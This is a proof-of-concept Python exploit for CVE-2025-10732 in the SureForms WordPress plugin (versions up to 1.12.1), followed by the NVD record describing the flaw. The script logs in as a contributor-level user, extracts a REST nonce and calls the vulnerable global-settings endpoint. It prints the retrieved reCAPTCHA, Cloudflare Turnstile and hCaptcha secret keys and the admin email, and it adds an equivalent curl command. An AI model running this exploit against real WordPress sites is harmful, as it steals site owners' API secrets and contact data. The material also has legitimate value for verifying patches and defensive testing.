CVE-2025-10732

# CVE-2025-10732 Proof of Concept # Vulnerability: Sensitive Information Disclosure in SureForms WordPress Plugin # Affected versions: <= 1.12.1 import requests # Target WordPress site URL target_url = "https://target-wordpress-site.com" # REST API endpoint with improper access control endpoint = f"{target_url}/wp-json/sureforms/v1/srfm-global-settings" # Attacker credentials (contributor-level access or above) username = "contributor_user" password = "attacker_password" # Step 1: Authenticate to WordPress and obtain session cookie session = requests.Session() # WordPress login endpoint login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": f"{target_url}/wp-admin/", "testcookie": "1" } # Perform login session.post(login_url, data=login_data, cookies={"wordpress_logged_in_test": "test"}) # Step 2: Obtain WordPress nonce for REST API authentication # Method 1: Extract nonce from the WordPress admin page admin_page = session.get(f"{target_url}/wp-admin/") # Look for the REST API nonce in the page source import re nonce_match = re.search(r'"nonce":"([a-f0-9]+)"', admin_page.text) if nonce_match: nonce = nonce_match.group(1) headers = { "X-WP-Nonce": nonce, "Content-Type": "application/json" } else: # Method 2: Try without nonce (may work if authentication cookie is sufficient) headers = { "Content-Type": "application/json" } # Step 3: Exploit the vulnerable endpoint to retrieve sensitive information print(f"[*] Accessing vulnerable endpoint: {endpoint}") response = session.get(endpoint, headers=headers) if response.status_code == 200: print("[+] Successfully retrieved sensitive information!") sensitive_data = response.json() # Display exfiltrated sensitive information print("\n[+] Exfiltrated Data:") if "google_recaptcha" in str(sensitive_data): print(f" Google reCAPTCHA Site Key: {sensitive_data.get('google_recaptcha_site_key', 'N/A')}") print(f" Google reCAPTCHA Secret Key: {sensitive_data.get('google_recaptcha_secret_key', 'N/A')}") if "cloudflare_turnstile" in str(sensitive_data): print(f" Cloudflare Turnstile Site Key: {sensitive_data.get('cloudflare_turnstile_site_key', 'N/A')}") print(f" Cloudflare Turnstile Secret Key: {sensitive_data.get('cloudflare_turnstile_secret_key', 'N/A')}") if "hcaptcha" in str(sensitive_data): print(f" hCaptcha Site Key: {sensitive_data.get('hcaptcha_site_key', 'N/A')}") print(f" hCaptcha Secret Key: {sensitive_data.get('hcaptcha_secret_key', 'N/A')}") if "admin_email" in str(sensitive_data): print(f" Admin Email: {sensitive_data.get('admin_email', 'N/A')}") print(f"\n[+] Full Response:\n{response.text}") else: print(f"[-] Failed to retrieve data. Status code: {response.status_code}") print(f"[-] Response: {response.text}") # Alternative: Using curl command print("\n[*] Alternative curl command:") print(f'''curl -X GET "{endpoint}" \\ -H "Cookie: wordpress_logged_in_xxx=YOUR_SESSION_COOKIE" \\ -H "X-WP-Nonce: YOUR_NONCE"''')

{"cve": {"id": "CVE-2025-10732", "sourceIdentifier": "[email protected]", "published": "2025-10-14T06:15:33.940", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The SureForms – Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 1.12.1. This is due to improper access control implementation on the '/wp-json/sureforms/v1/srfm-global-settings' REST API endpoint. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve sensitive information including API keys for Google reCAPTCHA, Cloudflare Turnstile, hCaptcha, admin email addresses, and security-related form settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/sureforms/tags/1.12.0/inc/global-settings/global-settings.php#L314", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/sureforms/tags/1.12.0/inc/global-settings/global-settings.php#L64", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3368400%40sureforms&new=3368400%40sureforms&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f30ae90a-54fb-4c55-a6ed-9c411a6997fb?source=cve", "source": "[email protected]"}]}}